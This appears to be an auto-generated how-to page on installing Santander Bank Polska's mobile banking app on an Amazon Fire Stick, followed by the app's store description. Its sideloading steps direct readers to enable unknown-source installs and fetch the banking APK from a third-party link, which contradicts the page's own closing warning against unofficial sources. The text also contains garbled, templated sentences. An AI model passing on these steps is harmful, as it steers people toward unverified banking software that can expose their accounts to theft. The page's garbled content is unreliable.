1. The Santander mobile application from Santander Bank Polska S.A. offers easy and convenient access to Santander online services.
2. In order to use all options available in the Santander mobile application, it is required to register the mobile device on which it is installed.
Option A: Install Santander mobile Directly on Your Fire Stick
- Santander mobile Fire Stick app can be found by going to the Apps section on the home screen » Scroll through the available apps, » Select Get when you find "Santander mobile" (the one you want).
NB: The apps you'll find here are listed under different categories, which makes it easier to find what you're looking for.
- How to Download Santander mobile Using the Search Function:
- Launch your Fire Stick and select the search (magnifying glass) icon from the top menu. You can find this in the top-left corner of your screen.
- Type "Santander mobile" in the search bar. You will be shown some suggestions. Select "Santander mobile" from the list.
- Click on "Get" or "Download" (You will see the Download button only if you have downloaded Santander mobile in the past.).
- Wait for the download to finish and select Open to launch the Santander mobile app.
Option B: Sideload Santander mobile app on your Amazon FireStick / Fire TV
Amazon's Fire TV devices run a heavily modified version of Android, which means you can install some Android apps on them. While the built-in Amazon Appstore has a wide selection of apps and games, you can also install software that is not available through the official store if you have the APK file.
Note also that Fire TV devices are not fully compatible with all Android apps - many games and apps are designed for a touchscreen and not a physical remote.
- From your device's home screen, hover over the "Find" option. Click on "Search." Search for "Downloader". Select the Downloader app. Click on "Download".
- Once Downloader is installed, go back to your device's home screen and open Settings » My Fire TV » Developer Options » Install Unknown Apps. You'll see the Downloader app. Click on it. This will set "Unknown Sources" to "On" for the Downloader app, which will enable side-loading on your device..
- Now open the Downloader app. A popup will appear asking if Downloader is allowed to access the files on your device. Click on "Allow".
- A popup called "Quick Start Guide" will now appear. Click 'Ok".
- You will now see a URL field. Place your cursor in the URL field and click the OK button on your remote control to open the keyboard.
- Type the following URL exactly as it is listed here -
https://7techgirl.com/cid/477371 and click "Go"
- Santander mobile apk file will start downloading. Wait until the file download is finished.
- After Santander mobile is downloaded, click "Install" on the next popup. Your Santander mobile APK will now be installed.
- After the download, you may be prompted to remove the installation file and free up space on your device. Click "Delete" to delete the file. You are now done.
- The installed Santander mobile app is now located under - Apps & Channels » See All.
Santander mobile is an Apk android app that was developed by Santander Bank Polska S.A.. It belongs to the Finance genre. The latest version of is version 6.3.1 and the it requires 4.1 to run it. If your Firestick runs on a higher android version than this, you have nothing to worry about.
The Santander mobile application from Santander Bank Polska S.A. offers easy and convenient access to Santander online services.
The application is for Polish clients and is available in Polish and English.
The application allows to:
- check balance, details and history of accounts, cards and savings
- make transfers between own accounts, also foreign currency accounts
- make transfers to any account in PLN, also by using QR codes
- make instant Express Elixir and BlueCash transfers
- make ATM withdrawal without card and payments in stationary or online shops using BLIK service
- make contactless payments via mobile phone:
--- requires device running Android 4.4 (KitKat) or higher, NFC-enabled with HCE support (Tap&Pay)
--- payments above 50 PLN require PIN to the ordered VISA / Mastercard mobile card
--- PIN must be set in Santander Internet, it is not set by default
- pay to mobile - for Santander Bank Polska S.A. customers and customers of other banks participating in BLIK payments system
- top-up mobile phone
- use Advisor online (Doradca online) feature
- receive push notifications
- apply for credit products (cash loan, overdraft limit, overdraft limit increase) – for customers with a credit products offer prepared in advance
- buy and sell currency using own accounts on the foreign currency exchange platform (eFX)
- open deposit
- repay credit card debt
- buy products and services using „Mobile Shopping” service
- buy travel insurance
- find branches, ATMs and PAYBACK partners nearby
- change PIN and the log-in method
- check currency rates table
- apply for personal account
-make transfer to Tax Office
-make transfer to Social Insurer
- manage cards: (activate, cancel, block, unblock, set up/ change PIN, withdrawals abroad)
- log-in by fingerprint
and to perform many other operations.
In order to use all options available in the Santander mobile application, it is required to register the mobile device on which it is installed.
NOTE: To ensure the maximum safety of the service, we recommend:
- not to install the application from unknown sources (outside Google Play)
- install only those applications from Google Play which come from known and trusted suppliers
- install and regularly update the antivirus software on your device